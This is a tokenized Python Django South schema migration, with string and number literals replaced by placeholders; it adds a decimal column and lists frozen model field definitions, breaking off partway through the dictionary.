<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> , null = True , max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:{}>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : 
'<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:{}>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:3>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> 
'<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:4>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' 
, '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : 
( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : 
